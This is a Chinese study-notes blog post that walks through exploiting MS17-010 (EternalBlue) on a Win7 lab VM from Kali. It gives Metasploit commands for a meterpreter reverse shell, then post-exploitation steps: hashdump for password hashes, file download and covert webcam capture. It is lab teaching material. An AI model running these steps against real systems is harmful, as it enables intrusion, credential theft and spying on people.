网络安全Day01笔记

渗透测试基础实战

实例: MS17-010
软件:Vmware Workstation 17
攻击机:Kali 靶机环境:Win7

简要介绍:

 是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。 恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 

复现步骤:

步骤1:查看受害者的机器是否存活 nmap (同一网段IP地址)(1/24)可加可不加 (攻击机与靶机注要保持同一网段 使用NAT,看相互是否ping通)
在这里插入图片描述

全面扫描 nmap -T4 -A -v -Pn (IP地址) 1/24

步骤2:启动msf(metasploit) 命令为msfconsole
在这里插入图片描述
查看必备参数是否填写完。
在这里插入图片描述

看到 RHOSTS(攻击目标)空缺
在这里插入图片描述

设置攻击目标并且看是否有MS17-010目标

步骤3 搜索漏洞 命令为:search ms17-010
在这里插入图片描述

步骤4 使用序号为1的攻击模块
命令:use 0
在这里插入图片描述

步骤5 查看设置攻击负载
因为 no payload 所以要设置攻击负载
查看 设置攻击负载
在这里插入图片描述

命令:set payload windows/x64/meterpreter/reverse_tcp

在这里插入图片描述

步骤6 设置受害者IP
命令:set rhost
步骤7 设置攻击者IP
命令:set lhost
在这里插入图片描述

输入run进行攻击 结果会显示WIN,表示拿到权限
在这里插入图片描述

拿到主机shell,发现会存在一定乱码,是编码的问题
在这里插入图片描述

使用命令chcp 65001
补充:
936 =GBK(显示中文用的) 437=MS-DOS的默认字符集 65001=UTF-8
在这里插入图片描述

步骤8 屏幕快照
在这里插入图片描述

上传到C盘
在这里插入图片描述

看到快照了
在这里插入图片描述

从目标机中下载文件
在这里插入图片描述

命令 getuid——查看权限,为管理员
在这里插入图片描述

hashdump获取密码md5码
在这里插入图片描述
在这里插入图片描述

其他命令:
webcam_list ——查看摄像头
webcam_snap——通过摄像头拍照
webcam_stream——通过摄像头开启视频

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

isolater-徐熠明

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值